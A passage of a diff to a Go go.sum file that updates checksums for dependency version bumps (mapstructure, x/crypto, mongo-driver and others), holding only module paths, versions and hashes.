h1:lTGmDsbAYt5DmK6OnoV7EuIF1wEIFAcxld6ypU4OSgU= +github.com/mattn/go-runewidth v0.0.13/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w= github.com/mattn/go-shellwords v1.0.3/go.mod h1:3xCvwCdWdlDJUrvuMn7Wuy9eWs4pE8vqg+NOMyg4B2o= github.com/mattn/go-shellwords v1.0.11/go.mod h1:EZzvwXDESEeg03EKmM+RmDnNOPKG4lLtQsUlTZDWQ8Y= github.com/mattn/go-sqlite3 v1.14.6/go.mod h1:NyWgC/yNuGj7Q9rpYnZvas74GogHl5/Z4A/KQRfk6bU= @@ -765,15 +802,17 @@ github.com/mitchellh/go-homedir v1.0.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrk github.com/mitchellh/go-homedir v1.1.0 h1:lukF9ziXFxDFPkA1vsr5zpc1XuPDn/wFntq5mG+4E0Y= github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0= github.com/mitchellh/go-testing-interface v1.0.0/go.mod h1:kRemZodwjscx+RGhAo8eIhFbs2+BFgRtFPeD/KE+zxI= -github.com/mitchellh/go-wordwrap v1.0.0 h1:6GlHJ/LTGMrIJbwgdqdl2eEH8o+Exx/0m8ir9Gns0u4= github.com/mitchellh/go-wordwrap v1.0.0/go.mod h1:ZXFpozHsX6DPmq2I0TCekCxypsnAUbP2oI0UX1GXzOo= +github.com/mitchellh/go-wordwrap v1.0.1 h1:TLuKupo69TCn6TQSyGxwI1EblZZEsQ0vMlAFQflz0v0= +github.com/mitchellh/go-wordwrap v1.0.1/go.mod h1:R62XHJLzvMFRBbcrT7m7WgmE1eOyTSsCt+hzestvNj0= github.com/mitchellh/gox v0.4.0/go.mod h1:Sd9lOJ0+aimLBi73mGofS1ycjY8lL3uZM3JPS42BGNg= github.com/mitchellh/iochan v1.0.0/go.mod h1:JwYml1nuB7xOzsp52dPpHFffvOCDupsG0QubkSMEySY= github.com/mitchellh/mapstructure v0.0.0-20160808181253-ca63d7c062ee/go.mod h1:FVVH3fgwuzCH5S8UJGiWEs2h04kUh9fWfEaFds41c1Y= github.com/mitchellh/mapstructure v1.1.2/go.mod h1:FVVH3fgwuzCH5S8UJGiWEs2h04kUh9fWfEaFds41c1Y= github.com/mitchellh/mapstructure v1.3.3/go.mod h1:bFUtVrKA4DC2yAKiSyO/QUcy7e+RRV2QTWOzhPopBRo= -github.com/mitchellh/mapstructure v1.4.1 h1:CpVNEelQCZBooIPDn+AR3NpivK/TIKU8bDxdASFVQag= github.com/mitchellh/mapstructure v1.4.1/go.mod h1:bFUtVrKA4DC2yAKiSyO/QUcy7e+RRV2QTWOzhPopBRo= +github.com/mitchellh/mapstructure v1.4.3 h1:OVowDSCllw/YjdLkam3/sm7wEtOy59d8ndGgCcyj8cs= +github.com/mitchellh/mapstructure v1.4.3/go.mod h1:bFUtVrKA4DC2yAKiSyO/QUcy7e+RRV2QTWOzhPopBRo= github.com/mitchellh/osext v0.0.0-20151018003038-5e2d6d41470f/go.mod h1:OkQIRizQZAeMln+1tSwduZz7+Af5oFlKirV/MSYes2A= github.com/mitchellh/reflectwalk v1.0.0/go.mod h1:mSTlrgnPZtwu0c4WaC2kGObEpuNDbx0jmZXqmk4esnw= github.com/mitchellh/reflectwalk v1.0.1/go.mod h1:mSTlrgnPZtwu0c4WaC2kGObEpuNDbx0jmZXqmk4esnw= @@ -784,14 +823,16 @@ github.com/moby/sys/mountinfo v0.4.0/go.mod h1:rEr8tzG/lsIZHBtN/JjGG+LMYx9eXgW2J github.com/moby/sys/mountinfo v0.4.1/go.mod h1:rEr8tzG/lsIZHBtN/JjGG+LMYx9eXgW2JI+6q0qou+A= github.com/moby/sys/symlink v0.1.0/go.mod h1:GGDODQmbFOjFsXvfLVn3+ZRxkch54RkSiGqsZeMYowQ= github.com/moby/term v0.0.0-20200312100748-672ec06f55cd/go.mod h1:DdlQx2hp0Ss5/fLikoLlEeIYiATotOjgB//nb973jeo= -github.com/moby/term v0.0.0-20210610120745-9d4ed1856297 h1:yH0SvLzcbZxcJXho2yh7CqdENGMQe73Cw3woZBpPli0= github.com/moby/term v0.0.0-20210610120745-9d4ed1856297/go.mod h1:vgPCkQMyxTZ7IDy8SXRufE172gr8+K/JE/7hHFxHW3A= +github.com/moby/term v0.0.0-20210619224110-3f7ff695adc6 h1:dcztxKSvZ4Id8iPpHERQBbIJfabdt4wUm5qy3wOL2Zc= +github.com/moby/term v0.0.0-20210619224110-3f7ff695adc6/go.mod h1:E2VnQOmVuvZB6UYnnDB0qG5Nq/1tD9acaOpo6xmt0Kw= github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg= github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= github.com/modern-go/reflect2 v0.0.0-20180701023420-4b7aa43c6742/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0= -github.com/modern-go/reflect2 v1.0.1 h1:9f412s+6RmYXLWZSEzVVgPGK7C2PphHj5RJrvfx9AWI= github.com/modern-go/reflect2 v1.0.1/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0= +github.com/modern-go/reflect2 v1.0.2 h1:xBagoLtFs94CBntxluKeaWgTMpvLxC4ur3nMaC9Gz0M= +github.com/modern-go/reflect2 v1.0.2/go.mod h1:yWuevngMOJpCy52FWWMvUC8ws7m/LJsjYzDa0/r8luk= github.com/monochromegane/go-gitignore v0.0.0-20200626010858-205db1a8cc00 h1:n6/2gBQ3RWajuToeY6ZtZTIKv2v7ThUy5KKusIT0yc0= github.com/monochromegane/go-gitignore v0.0.0-20200626010858-205db1a8cc00/go.mod h1:Pm3mSP3c5uWn86xMLZ5Sa7JB9GsEZySvHYXCTK4E9q4= github.com/montanaflynn/stats v0.0.0-20171201202039-1bf9dbcd8cbe/go.mod h1:wL8QJuTMNUDYhXwkmfOly8iTdp5TEcJFWZD2D7SIkUc= @@ -804,8 +845,9 @@ github.com/mwitkow/go-conntrack v0.0.0-20190716064945-2f068394615f/go.mod h1:qRW github.com/mxk/go-flowrate v0.0.0-20140419014527-cca7078d478f/go.mod h1:ZdcZmHo+o7JKHSa8/e818NopupXU1YMK5fe1lsApnBw= github.com/ncw/swift v1.0.47/go.mod h1:23YIA4yWVnGwv2dQlN4bB7egfYX6YLn0Yo/S6zZO/ZM= github.com/niemeyer/pretty v0.0.0-20200227124842-a10e7caefd8e/go.mod h1:zD1mROLANZcx1PVRCS0qkT7pwLkGfwJo4zjcN/Tysno= -github.com/nwaples/rardecode v1.1.0 h1:vSxaY8vQhOcVr4mm5e8XllHWTiM4JF507A0Katqw7MQ= github.com/nwaples/rardecode v1.1.0/go.mod h1:5DzqNKiOdpKKBH87u8VlvAnPZMXcGRhxWkRpHbbfGS0= +github.com/nwaples/rardecode v1.1.2 h1:Cj0yZY6T1Zx1R7AhTbyGSALm44/Mmq+BAPc4B/p/d3M= +github.com/nwaples/rardecode v1.1.2/go.mod h1:5DzqNKiOdpKKBH87u8VlvAnPZMXcGRhxWkRpHbbfGS0= github.com/nxadm/tail v1.4.4 h1:DQuhQpB1tVlglWS2hLQ5OV6B5r8aGxSrPc5Qo6uTN78= github.com/nxadm/tail v1.4.4/go.mod h1:kenIhsEOeOJmVchQTgglprH7qJGnHDVpk1VPCcaMI8A= github.com/oklog/ulid v1.3.1 h1:EGfNDEx6MqHz8B3uNV6QAib1UR2Lm97sHi3ocA6ESJ4= @@ -862,8 +904,9 @@ github.com/pelletier/go-toml v1.9.3/go.mod h1:u1nR/EPcESfeI/szUZKdtJ0xRNbUoANCko github.com/peterbourgon/diskv v2.0.1+incompatible h1:UBdAOUP5p4RWqPBg048CAvpKN+vxiaj6gdUUzhl4XmI= github.com/peterbourgon/diskv v2.0.1+incompatible/go.mod h1:uqqh8zWWbv1HBMNONnaR/tNboyR3/BZd58JJSHlUSCU= github.com/phayes/freeport v0.0.0-20180830031419-95f893ade6f2/go.mod h1:iIss55rKnNBTvrwdmkUpLnDpZoAHvWaiq5+iMmen4AE= -github.com/pierrec/lz4/v4 v4.1.2 h1:qvY3YFXRQE/XB8MlLzJH7mSzBs74eA2gg52YTk6jUPM= github.com/pierrec/lz4/v4 v4.1.2/go.mod h1:gZWDp/Ze/IJXGXf23ltt2EXimqmTUXEy0GFuRQyBid4= +github.com/pierrec/lz4/v4 v4.1.12 h1:44l88ehTZAUGW4VlO1QC4zkilL99M6Y9MXNwEs0uzP8= +github.com/pierrec/lz4/v4 v4.1.12/go.mod h1:gZWDp/Ze/IJXGXf23ltt2EXimqmTUXEy0GFuRQyBid4= github.com/pkg/errors v0.8.0/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= github.com/pkg/errors v0.8.1-0.20171018195549-f15c970de5b7/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= @@ -893,6 +936,7 @@ github.com/prometheus/common v0.4.1/go.mod h1:TNfzLD0ON7rHzMJeJkieUDPYmFC7Snx/y8 github.com/prometheus/common v0.6.0/go.mod h1:eBmuwkDJBwy6iBfxCBob6t6dR6ENT/y+J+Zk0j9GMYc= github.com/prometheus/common v0.10.0/go.mod h1:Tlit/dnDKsSWFlCLTWaA1cyBgKHSMdTB80sz/V91rCo= github.com/prometheus/common v0.26.0/go.mod h1:M7rCNAaPfAosfx8veZJCuw84e35h3Cfd9VFqTh1DIvc= +github.com/prometheus/common v0.28.0/go.mod h1:vu+V0TpY+O6vW9J44gczi3Ap/oXXR10b+M/gUGO4Hls= github.com/prometheus/procfs v0.0.0-20180125133057-cb4147076ac7/go.mod h1:c3At6R/oaqEKCNdg8wHV1ftS6bRYblBhIjjI8uT2IGk= github.com/prometheus/procfs v0.0.0-20181005140218-185b4288413d/go.mod h1:c3At6R/oaqEKCNdg8wHV1ftS6bRYblBhIjjI8uT2IGk= github.com/prometheus/procfs v0.0.0-20190425082905-87a4384529e0/go.mod h1:TjEm7ze935MbeOT/UhFTIMYKhuLP4wbCsTZCD3I8kEA= @@ -908,6 +952,8 @@ github.com/prometheus/procfs v0.6.0/go.mod h1:cz+aTbrPOrUb4q7XlbU9ygM+/jj0fzG6c1 github.com/prometheus/procfs v0.7.3 h1:4jVXhlkAyzOScmCkXBTOLRLTz8EeU+eyjrwB/EPq0VU= github.com/prometheus/procfs v0.7.3/go.mod h1:cz+aTbrPOrUb4q7XlbU9ygM+/jj0fzG6c1xBZuNvfVA= github.com/prometheus/tsdb v0.7.1/go.mod h1:qhTCs0VvXwvX/y3TZrWD7rabWM+ijKTux40TwIPHuXU= +github.com/rivo/uniseg v0.2.0 h1:S1pD9weZBuJdFmowNwbpi7BJ8TNftyUImj/0WQi72jY= +github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= github.com/rogpeppe/fastuuid v0.0.0-20150106093220-6724a57986af/go.mod h1:XWv6SoW27p1b0cqNHllgS5HIMJraePCO15w5zCzIWYg= github.com/rogpeppe/fastuuid v1.2.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= github.com/rogpeppe/go-internal v1.1.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= @@ -915,8 +961,9 @@ github.com/rogpeppe/go-internal v1.2.2/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFR github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= github.com/rogpeppe/go-internal v1.5.2/go.mod h1:xXDCJY+GAPziupqXw64V24skbSoqbTEfhy4qGm1nDQc= github.com/rubenv/sql-migrate v0.0.0-20210614095031-55d5740dbbcc/go.mod h1:HFLT6i9iR4QBOF5rdCyjddC9t59ArqWJV2xx+jwcCMo= -github.com/russross/blackfriday v1.5.2 h1:HyvC0ARfnZBqnXwABFeSZHpKvJHJJfPz81GNueLj0oo= github.com/russross/blackfriday v1.5.2/go.mod h1:JO/DiYxRf+HjHt06OyowR9PTA263kcR/rfWxYHBV53g= +github.com/russross/blackfriday v1.6.0 h1:KqfZb0pUVN2lYqZUYRddxF4OR8ZMURnJIG5Y3VRLtww= +github.com/russross/blackfriday v1.6.0/go.mod h1:ti0ldHuxg49ri4ksnFxlkCfN+hvslNlmVHqNRXXJNAY= github.com/russross/blackfriday/v2 v2.0.1/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= github.com/ryanuber/columnize v0.0.0-20160712163229-9b3edd62028f/go.mod h1:sm1tb6uqfes/u+d4ooFouqFdy9/2g9QGwK3SQygK0Ts= github.com/safchain/ethtool v0.0.0-20190326074333-42ed695e3de8/go.mod h1:Z0q5wiBQGYcxhMZ6gUqHn6pYNLypFAvaL3UvgZLR0U4= @@ -925,8 +972,9 @@ github.com/santhosh-tekuri/jsonschema v1.2.4/go.mod h1:TEAUOeZSmIxTTuHatJzrvARHi github.com/satori/go.uuid v1.2.0/go.mod h1:dA0hQrYB0VpLJoorglMZABFdXlWrHn1NEOzdhQKdks0= github.com/sean-/seed v0.0.0-20170313163322-e2103e2c3529/go.mod h1:DxrIzT+xaE7yg65j358z/aeFdxmN0P9QXhEzd20vsDc= github.com/seccomp/libseccomp-golang v0.9.1/go.mod h1:GbW5+tmTXfcxTToHLXlScSlAvWlF4P2Ca7zGrPiEpWo= -github.com/sergi/go-diff v1.1.0 h1:we8PVUC3FE2uYfodKH/nBHMSetSfHDR6scGdBi+erh0= github.com/sergi/go-diff v1.1.0/go.mod h1:STckp+ISIX8hZLjrqAeVduY0gWCT9IjLuqbuNXdaHfM= +github.com/sergi/go-diff v1.2.0 h1:XU+rvMAioB0UC3q1MFrIQy4Vo5/4VsRDQQXHsEya6xQ= +github.com/sergi/go-diff v1.2.0/go.mod h1:STckp+ISIX8hZLjrqAeVduY0gWCT9IjLuqbuNXdaHfM= github.com/shopspring/decimal v1.2.0/go.mod h1:DKyhrW/HYNuLGql+MJL6WCR6knT2jwCFRcu2hWCYk4o= github.com/shurcooL/sanitized_anchor_name v1.0.0/go.mod h1:1NzhyTcUVG4SuEtjjoZeVRXNmyL/1OwPU0+IJeTBvfc= github.com/sirupsen/logrus v1.0.4-0.20170822132746-89742aefa4b2/go.mod h1:pMByvHTf9Beacp5x1UXfOR9xyW/9antXMhjMPG0dEzc= @@ -997,8 +1045,9 @@ github.com/tmc/grpc-websocket-proxy v0.0.0-20190109142713-0ad062ec5ee5/go.mod h1 github.com/tmc/grpc-websocket-proxy v0.0.0-20201229170055-e5319fda7802/go.mod h1:ncp9v5uamzpCO7NfCPTXjqaC+bZgJeR0sMTm6dMHP7U= github.com/ugorji/go v1.1.4/go.mod h1:uQMGLiO92mf5W77hV/PUCpI3pbzQx3CRekS0kk+RGrc= github.com/ulikunitz/xz v0.5.8/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= -github.com/ulikunitz/xz v0.5.9 h1:RsKRIA2MO8x56wkkcd3LbtcE/uMszhb6DpRf+3uwa3I= github.com/ulikunitz/xz v0.5.9/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= +github.com/ulikunitz/xz v0.5.10 h1:t92gobL9l3HE202wg3rlk19F6X+JOxl9BBrCCMYEYd8= +github.com/ulikunitz/xz v0.5.10/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= github.com/urfave/cli v0.0.0-20171014202726-7bc6a0acffa5/go.mod h1:70zkFmudgCuE/ngEzBv17Jvp/497gISqfk5gWijbERA= github.com/urfave/cli v1.20.0/go.mod h1:70zkFmudgCuE/ngEzBv17Jvp/497gISqfk5gWijbERA= github.com/urfave/cli v1.22.1/go.mod h1:Gos4lmkARVdJ6EkW0WaNv/tZAAMe9V7XWyB60NtXRu0= @@ -1011,8 +1060,9 @@ github.com/vishvananda/netns v0.0.0-20191106174202-0a2b9b5464df/go.mod h1:JP3t17 github.com/vishvananda/netns v0.0.0-20200728191858-db3c7e526aae/go.mod h1:DD4vA1DwXk04H54A1oHXtwZmA0grkVMdPxx/VGLCah0= github.com/willf/bitset v1.1.11-0.20200630133818-d5bec3311243/go.mod h1:RjeCKbqT1RxIR/KWY6phxZiaY1IyutSBfGjNPySAYV4= github.com/willf/bitset v1.1.11/go.mod h1:83CECat5yLh5zVOf4P1ErAgKA5UDvKtgyUABdr3+MjI= -github.com/xanzy/ssh-agent v0.3.0 h1:wUMzuKtKilRgBAD1sUb8gOwwRr2FGoBVumcjoOACClI= github.com/xanzy/ssh-agent v0.3.0/go.mod h1:3s9xbODqPuuhK9JV1R321M/FlMZSBvE5aY6eAcqrDh0= +github.com/xanzy/ssh-agent v0.3.1 h1:AmzO1SSWxw73zxFZPRwaMN1MohDw8UyHnmuxyceTEGo= +github.com/xanzy/ssh-agent v0.3.1/go.mod h1:QIE4lCeL7nkC25x+yA3LBIYfwCc1TFziCtG7cBAac6w= github.com/xdg-go/pbkdf2 v1.0.0/go.mod h1:jrpuAogTd400dnrH08LKmI/xc1MbPOebTwRqcT5RDeI= github.com/xdg-go/scram v1.0.2/go.mod h1:1WAq6h33pAW+iRreB34OORO2Nf7qel3VV3fjBj+hCSs= github.com/xdg-go/stringprep v1.0.2/go.mod h1:8F9zXuvzgwmyT5DUm4GUfZGDdT3W+LCvS6+da4O5kxM= @@ -1027,8 +1077,9 @@ github.com/xeipuuv/gojsonschema v1.2.0/go.mod h1:anYRn/JVcOK2ZgGU+IjEV4nwlhoK5sQ github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 h1:nIPpBwaJSVYIxUFsDv3M8ofmx9yWTog9BfvIu0q41lo= github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8/go.mod h1:HUYIGzjTL3rfEspMxjDjgmT5uz5wzYJKVo23qUhYTos= github.com/xiang90/probing v0.0.0-20190116061207-43a291ad63a2/go.mod h1:UETIi67q53MR2AWcXfiuqkDkRtnGDLqkBTpCHuJHxtU= -github.com/xlab/treeprint v0.0.0-20181112141820-a009c3971eca h1:1CFlNzQhALwjS9mBAUkycX616GzgsuYUOCHA5+HSlXI= github.com/xlab/treeprint v0.0.0-20181112141820-a009c3971eca/go.mod h1:ce1O1j6UtZfjr22oyGxGLbauSBp2YVXpARAosm7dHBg= +github.com/xlab/treeprint v1.1.0 h1:G/1DjNkPpfZCFt9CSh6b5/nY4VimlbHF3Rh4obvtzDk= +github.com/xlab/treeprint v1.1.0/go.mod h1:gj5Gd3gPdKtR1ikdDK6fnFLdmIS0X30kTTuNd/WEJu0= github.com/xordataexchange/crypt v0.0.3-0.20170626215501-b2862e3d0a77/go.mod h1:aYKd//L2LvnjZzWKhF00oedf4jCCReLcmhLdhm1A27Q= github.com/youmark/pkcs8 v0.0.0-20181117223130-1be2e3e5546d/go.mod h1:rHwXgn7JulP+udvsHwJoVG1YGAP6VLg4y9I5dyZdqmA= github.com/yuin/goldmark v1.1.25/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= @@ -1037,6 +1088,7 @@ github.com/yuin/goldmark v1.1.32/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9de github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= github.com/yuin/goldmark v1.4.0/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= +github.com/yuin/goldmark v1.4.1/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= github.com/yvasiyarov/go-metrics v0.0.0-20140926110328-57bccd1ccd43/go.mod h1:aX5oPXxHm3bOH+xeAttToC8pqch2ScQN/JoXYupl6xs= github.com/yvasiyarov/gorelic v0.0.0-20141212073537-a9bba5b9ab50/go.mod h1:NUSPSUX/bi6SeDMUh6brw0nXpxHnc96TguQh0+r/ssA= github.com/yvasiyarov/newrelic_platform_go v0.0.0-20140908184405-b21fdbd4370f/go.mod h1:GlGEuHIJweS1mbCqG+7vt2nvWLzLLnRHbXz5JKd/Qbg= @@ -1064,8 +1116,10 @@ go.etcd.io/etcd/client/v3 v3.5.0/go.mod h1:AIKXXVX/DQXtfTEqBryiLTUXwON+GuvO6Z7lL go.etcd.io/etcd/pkg/v3 v3.5.0/go.mod h1:UzJGatBQ1lXChBkQF0AuAtkRQMYnHubxAEYIrC3MSsE= go.etcd.io/etcd/raft/v3 v3.5.0/go.mod h1:UFOHSIvO/nKwd4lhkwabrTD3cqW5yVyYYf/KlD00Szc= go.etcd.io/etcd/server/v3 v3.5.0/go.mod h1:3Ah5ruV+M+7RZr0+Y/5mNLwC+eQlni+mQmOVdCRJoS4= -go.mongodb.org/mongo-driver v1.7.3 h1:G4l/eYY9VrQAK/AUgkV0koQKzQnyddnWxrd/Etf0jIs= go.mongodb.org/mongo-driver v1.7.3/go.mod h1:NqaYOwnXWr5Pm7AOpO5QFxKJ503nbMse/R79oO62zWg= +go.mongodb.org/mongo-driver v1.7.5/go.mod h1:VXEWRZ6URJIkUq2SCAyapmhH0ZLRBP+FT4xhp5Zvxng= +go.mongodb.org/mongo-driver v1.8.1 h1:OZE4Wni/SJlrcmSIBRYNzunX5TKxjrTS4jKSnA99oKU= +go.mongodb.org/mongo-driver v1.8.1/go.mod h1:0sQWfOeY63QTntERDJJ/0SuKK0T1uVSgKCuAROlKEPY= go.mozilla.org/pkcs7 v0.0.0-20200128120323-432b2356ecb1/go.mod h1:SNgMg+EgDFwmvSmLRTNKC5fegJjB7v23qTQ0XLGUNHk= go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU= go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8= @@ -1086,8 +1140,9 @@ go.opentelemetry.io/otel/sdk/export/metric v0.20.0/go.mod h1:h7RBNMsDJ5pmI1zExLi go.opentelemetry.io/otel/sdk/metric v0.20.0/go.mod h1:knxiS8Xd4E/N+ZqKmUPf3gTTZ4/0TjTXukfxjzSTpHE= go.opentelemetry.io/otel/trace v0.20.0/go.mod h1:6GjCW8zgDjwGHGa6GkyeB8+/5vjT16gUEi0Nf1iBdgw= go.opentelemetry.io/proto/otlp v0.7.0/go.mod h1:PqfVotwruBrMGOCsRd/89rSnXhoiJIqeYNgFYFoEGnI= -go.starlark.net v0.0.0-20200306205701-8dd3e2ee1dd5 h1:+FNtrFTmVw0YZGpBGX56XDee331t6JAXeK2bcyhLOOc= go.starlark.net v0.0.0-20200306205701-8dd3e2ee1dd5/go.mod h1:nmDLcffg48OtT/PSW0Hg7FvpRQsQh5OSqIylirxKC7o= +go.starlark.net v0.0.0-20211203141949-70c0e40ae128 h1:bxH+EXOo87zEOwKDdZ8Tevgi6irRbqheRm/fr293c58= +go.starlark.net v0.0.0-20211203141949-70c0e40ae128/go.mod h1:t3mmBBPzAVvK0L0n1drDmrQsJ8FoIx4INCqVMTr/Zo0= go.uber.org/atomic v1.3.2/go.mod h1:gD2HeocX3+yG+ygLZcrzQJaqmWj9AIm7n08wl/qW/PE= go.uber.org/atomic v1.4.0/go.mod h1:gD2HeocX3+yG+ygLZcrzQJaqmWj9AIm7n08wl/qW/PE= go.uber.org/atomic v1.7.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc= @@ -1096,6 +1151,7 @@ go.uber.org/multierr v1.1.0/go.mod h1:wR5kodmAFQ0UK8QlbwjlSNy0Z68gJhDJUG5sjR94q/ go.uber.org/multierr v1.6.0/go.mod h1:cdWPpRnG4AhwMwsgIHip0KRBQjJy5kYEpYjJxpXp9iU= go.uber.org/zap v1.10.0/go.mod h1:vwi/ZaCAaUcBkycHslxD9B2zi4UTXhF60s6SWpuDF0Q= go.uber.org/zap v1.17.0/go.mod h1:MXVU+bhUf/A7Xi2HNOnopQOrmycQ5Ih87HtOu4q5SSo= +go.uber.org/zap v1.19.0/go.mod h1:xg/QME4nWcxGxrpdeYfq7UvYrLh66cuVKdrbD1XF/NI= golang.org/x/crypto v0.0.0-20171113213409-9f005a07e0d3/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4= golang.org/x/crypto v0.0.0-20180904163835-0709b304e793/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4= golang.org/x/crypto v0.0.0-20181009213950-7c1a557ab941/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4= @@ -1119,11 +1175,15 @@ golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPh golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20200820211705-5c72a883971a/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20201002170205-7f63de1d35b0/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= +golang.org/x/crypto v0.0.0-20201216223049-8b5274cf687f/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I= golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I= golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4= golang.org/x/crypto v0.0.0-20210421170649-83a5a9bb288b/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4= -golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a h1:kr2P4QFmQr29mSLA43kwrOcgcReGTfbE9N577tCTuBc= golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a/go.mod h1:P+XmwS30IXTQdn5tA2iutPOUgjI07+tq3H3K9MVA1s8= +golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= +golang.org/x/crypto v0.0.0-20210817164053-32db794688a5/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= +golang.org/x/crypto v0.0.0-20211209193657-4570a0811e8b h1:QAqMVf3pSa6eeTsuklijukjXBlj7Es2QQplab+/RbQ4= +golang.org/x/crypto v0.0.0-20211209193657-4570a0811e8b/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190306152737-a1d7652674e8/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190510132918-efd6b22b2522/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8= @@ -1216,9 +1276,15 @@ golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v golang.org/x/net v0.0.0-20210316092652-d523dce5a7f4/go.mod h1:RBQZq4jEuRlivfhVLdyRGr576XBO4/greRjx4P4O3yc= golang.org/x/net v0.0.0-20210326060303-6b1517762897/go.mod h1:uSPa2vr4CLtc/ILN5odXGNXS6mhrKVzTaCXzk9m6W3k= golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM= +golang.org/x/net v0.0.0-20210421230115-4e50805a0758/go.mod h1:72T/g9IO56b78aLF+1Kcs5dz7/ng1VjMUvfKvpfy+jM= golang.org/x/net v0.0.0-20210520170846-37e1c6afe023/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= -golang.org/x/net v0.0.0-20210805182204-aaa1db679c0d h1:20cMwl2fHAzkJMEA+8J4JgqBQcQGzbisXo31MIeenXI= +golang.org/x/net v0.0.0-20210525063256-abc453219eb5/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20210805182204-aaa1db679c0d/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net 